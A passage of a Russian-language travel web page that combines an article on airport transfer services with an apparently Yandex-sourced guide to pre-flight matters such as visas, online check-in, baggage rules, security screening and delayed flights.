платите только за него, а все остальные расходы оплачивает компания; отсутствие временных границ выполнения при условии предварительного предупреждения (продолжение отпуска, перенос вылета); экономия времени (не надо искать такси); безопасность; не дороже, а то и дешевле такси.

Трансфер условно можно разделить на два основных вида:

индивидуальный; групповой.

Индивидуальный трансфер

Незаменим, если Вы хотите осмотреть достопримечательности, пройтись по магазинам или посетить различные мероприятия. Такой трансфер, будет вас перемещать по заранее разработанному маршруту. Персональный водитель будет вас везде сопровождать, ожидать необходимое время.

Обычно компании ответственно подходят к выбору персонала, чтобы было удобно общаться, вы чувствовали себя в безопасности и получали удовольствие от поездки.

Такой вид трансфера является самой востребованной услугой среди туристов, так как личная безопасность и гарантии выполнения – это самое важное в успешной поездке в другой город.

Групповой трансфер

Такой вид трансфера означает, что от аэропорта до гостиницы, или в другие места, встречается и перевозится группа туристов на автобусе или микроавтобусе.

Когда нужно заказывать групповой трансфер:

для проведения экскурсий; в деловых поездках; для доставки группы деловых партнеров в желаемое место назначения; для проведения торжественных мероприятий (свадьбы, дней рождения); при организации конференций или конгрессов; при посещении массовых мероприятий, концертов.

Помимо этих двух основных видов трансфера, транспортные компании предоставляют дополнительные трансферные услуги:

  • общий трансфер: имеется в виду перевозка с другими людьми, которые едут в том же направлении или в тоже место назначения, что и вы.
  • бизнес-трансфер или VIP-трансфер: перевозка с повышенным уровнем комфорта ( автомобиль высокого класса, лимузины, напитки во время передвижения, дополнительные услуги

Воспользовавшись хоть раз услугой трансфера для организации своих поездок во время отдыха, вы поймете, что это гораздо удобнее, надежней, качественнее, а в некоторых случаях даже дешевле, чем пользоваться местным такси или общественным транспортом. Особенно рекомендуется использовать данную услугу в большом и не знакомом городе.

Источник: http://bestsprinter.ru/additionally/poleznye-stati/64-chto-takoe-transfer.html

Перед вылетом

В аэропорт всегда стараются приезжать заранее — чтобы успеть зарегистрироваться на рейс, пройти все стадии досмотра, сдать багаж и, возможно, зайти в дьюти-фри (магазины беспошлинной торговли).

Какие документы нужны для перелёта

В аэропорту вам понадобятся как минимум два документа — паспорт и билет (бумажный или электронный). Для перелётов по России нужен внутренний паспорт, а для международных — заграничный.

Если вы летите за границу, то вам, скорее всего, потребуется виза. Её можно получить в посольстве или визовом центре, и сделать это лучше заранее (например, получением шенгенской визы стоит озаботиться за несколько недель до поездки).

Однако есть ряд государств, которые выдают визы уже по прибытии человека в страну. Например, египетская виза — это просто штамп в паспорте, который вам ставят на паспортном контроле.

А у некоторых стран, например у Израиля, вообще установлен с Россией безвизовый режим.

Если вы летите с пересадкой, обязательно уточните, не потребуется ли вам транзитная виза. Её тоже нужно оформлять заранее.

Электронная регистрация на рейс

Некоторые авиакомпании позволяют регистрироваться на самолёт через интернет. Как и в аэропорту, вы сообщаете системе свои данные и получаете посадочный талон. Это можно сделать на сайте авиакомпании и иногда — на сайте аэропорта.

Преимущества онлайн-регистрации:

  • Регистрация обычно начинается за сутки до вылета, поэтому вы можете пройти её, когда вам удобно.
  • Вам не нужно приезжать в аэропорт заранее и стоять в очереди на регистрацию.
  • Вы оформляете посадочный талон заранее, а значит, можете получить самые удобные места в салоне.
  • Если вы забудете или потеряете посадочный талон, его можно будет распечатать в аэропорту (однако у некоторых авиакомпаний эта услуга платная).

Электронная регистрация доступна не во всех аэропортах и не на все рейсы. Вам придётся регистрироваться обычным способом и в некоторых других ситуациях: если с вами по бесплатному билету едет младенец, вы сопровождаете человека с ограниченными возможностями, везёте животных или произведения искусства.

Что можно взять в самолёт

Все вещи пассажира делятся на зарегистрированный багаж — тот, который сдаётся на стойке регистрации — и ручную кладь, которую берут в салон. Вес, размер и количество мест того и другого всегда жёстко ограничены — перед полётом нужно внимательно изучить правила на сайте авиакомпании.

Иногда стоимость провоза багажа включена в цену билета. Обычно в этом случае речь идёт об одном чемодане — за второй придётся доплатить. Однако чаще всего авиакомпании предлагают два варианта билетов — для тех, кто собирается лететь с багажом и для тех, кто планирует брать только ручную кладь.

Авиакомпании-лоукостеры чаще всего предлагают платить за багаж отдельно. Это можно сделать при покупке билета или уже в аэропорту. Некоторые лоукостеры поступают наоборот: взимают дополнительную плату за провоз ручной клади, а не за сдаваемый багаж.

Единого мирового стандарта по поводу того, что можно, а что нельзя брать в самолёт, не существует: правила зависят от страны и авиакомпании. Но есть ограничения, которые действуют в большинстве авиакомпаний.

Например, вот список того, что категорически нельзя провозить ни в ручной клади, ни в багаже:

  • взрывчатые вещества, средства взрывания и предметы, ими начинённые;
  • сжатые и сжиженные газы;
  • легковоспламеняющиеся жидкости;
  • воспламеняющиеся твёрдые вещества;
  • окисляющие вещества и органические перекиси;
  • токсичные вещества;
  • радиоактивные материалы;
  • едкие и коррозирующие вещества;
  • ядовитые и отравляющие вещества;
  • оружие.

В багаже обычно можно провозить любые предметы, кроме перечисленного выше.

С ручной кладью дела обстоят сложнее. Если вы сомневаетесь, можно ли брать на борт какой-то предмет, обязательно уточните это. Большинство авиакомпаний разрешает взять:

  • дамскую сумочку или папку для бумаг;
  • печатные издания для чтения в полёте;
  • питание для ребёнка;
  • детскую дорожную колыбель;
  • зонтик или трость;
  • пальто или плащ;
  • при необходимости — детскую складную коляску, складную инвалидную коляску, костыли.

А также жидкости в строго ограниченном количестве и некоторые «опасные» предметы, по одному на пассажира:

  • медицинский градусник;
  • одноразовую зажигалку;
  • неопасные жидкости, гели и аэрозоли (в ёмкостях не более 100 мл) в надёжно закрытом прозрачном полиэтиленовом пакете общим объёмом не более литра;
  • жидкости, купленные в дьюти-фри в закрытом полиэтиленовом пакете (на нём должно быть подтверждение того, что это куплено в дьюти-фри в день полёта).

Обратите внимание, что эти правила (а особенно правила провоза жидкостей) могут меняться. Кроме того, администрация аэропорта и авиакомпания могут вводить и другие ограничения.

Какие стадии досмотра необходимо пройти в аэропорту

Куда бы вы ни летели, перед тем как сесть в самолёт, вам придётся пройти досмотр службой безопасности (спецконтроль). Это обязательное правило во всех аэропортах. Цель досмотра — проверить, что вы не провозите ничего запрещённого в багаже и ручной клади.

В зависимости от аэропорта багаж могут проверять при пассажире или без его участия. Если вы получаете посадочный талон и одновременно сдаёте багаж, то его проверят без вас. При вас досмотрят только ручную кладь — непосредственно перед посадкой в самолёт. В других случаях сначала проходит регистрация пассажиров, а потом спецконтроль. В таком случае всё, что вы везёте, проверят при вас.

Во многих аэропортах на входе установлены дополнительные рамки металлоискателей. Имейте в виду, что перед ними может образоваться очередь.

Перед международными рейсами обычно сначала проводится таможенный контроль, затем — регистрация, после неё — паспортно-визовый контроль. По прилёту это происходит в обратном порядке: сначала паспортный контроль, а потом, после получения багажа, — таможенный.

Таможенный контроль по прилёту в страну проходят те, кому есть что декларировать (например, большую сумму наличных денег или сундук с золотом) — такие пассажиры отправляются по красному коридору, остальные без дополнительного досмотра проходят через зелёный.

Что делать, если рейс задержали или отменили

Если самолёт сильно задерживается и вы рискуете не успеть сделать пересадку, необходимо обратиться к представителю авиакомпании. Узнайте у него причину задержки и предполагаемое время вылета. Если дело не в погодных условиях, попросите посадить вас на другой подходящий рейс этой же авиакомпании. Вам обязаны при первой возможности предоставить место без доплаты.

Если рейс по вине авиакомпании задержался более чем на два часа, вы можете получить ваучер на питание в аэропорту. А если самолёт опаздывает ещё сильнее (более чем на 6 часов ночью или на 8 днём), вас должны не только накормить, но и разместить в гостинице. В ряде стран, в том числе в России и в странах Евросоюза, эти нормы установлены законодательно.

Если авиакомпания не предоставила вам питание и номер в гостинице, сохраните все чеки за еду, номер в отеле, такси в аэропорт и из аэропорта. Авиаперевозчик должен будет компенсировать вам все эти расходы. Не забудьте потребовать подтверждение задержки рейса — это могут быть отметки на билете или справка. Эти правила касаются как регулярных, так и чартерных рейсов.

Можно ли переночевать в аэропорту

Если вы летите с пересадкой и рейсы сильно разнесены по времени, возможно, вам придётся где-то переночевать. Иногда это можно сделать в гостинице при аэропорте или даже в самом аэропорту (например, в московском Шереметьево есть капсульный отель).

Но есть аэропорты, где всех пассажиров попросят на ночь покинуть зону ожидания. Тогда ночевать придётся в городе. Перед такой поездкой не забудьте уточнить режим работы аэропорта и при необходимости получить визу страны, где вы собираетесь ночевать.

Учтите, что перелёты с ночёвкой — это не очень удобно, но, как правило, дёшево.

Можно ли курить в аэропорту

В аэропортах можно курить только в специальных комнатах для курения. Но они есть не везде.

За сколько часов до вылета надо приезжать в аэропорт

Если вы не любите торопиться, в аэропорт лучше приезжать к началу регистрации. То есть примерно за три часа до вылета за границу и за два, если вы летите внутренним рейсом.

На рейсы многих авиакомпаний можно зарегистрироваться заранее — в интернете или на железнодорожном вокзале. Тогда вы можете приехать позже.

Бывают и осложняющие факторы — например, если вы везёте с собой животных или нестандартный багаж, либо на дорогах или в аэропорту час пик. Тогда желательно приехать раньше.

Если вы путешествуете компанией и хотели бы сидеть в самолёте на соседних местах, вам также стоит приехать к началу регистрации.

Экспресс в аэропорт

В некоторых городах до аэропорта можно добраться на комфортном скоростном поезде. Он курсирует между городом и аэропортом без остановок (или почти без них). Экспрессы ездят:

  • от московских аэропортов и обратно (Внуково — Киевский вокзал, Шереметьево — Белорусский вокзал, Домодедово — Павелецкий вокзал);
  • от аэропорта Кневичи до вокзала Владивостока и обратно (с остановками Вторая Речка, Угольная и Артём).

В поездах есть вагоны экономического и бизнес-класса. В бизнес-классе пассажиры едут в более комфортных креслах, а кроме того, во время поездки им предлагают печатную продукцию и прохладительные напитки.

Расписание скоростных поездов можно посмотреть на сайте РЖД или «Аэроэкспресса».

Источник: https://avia.yandex.ru/info/before_flight

Ссылка на основную публикацию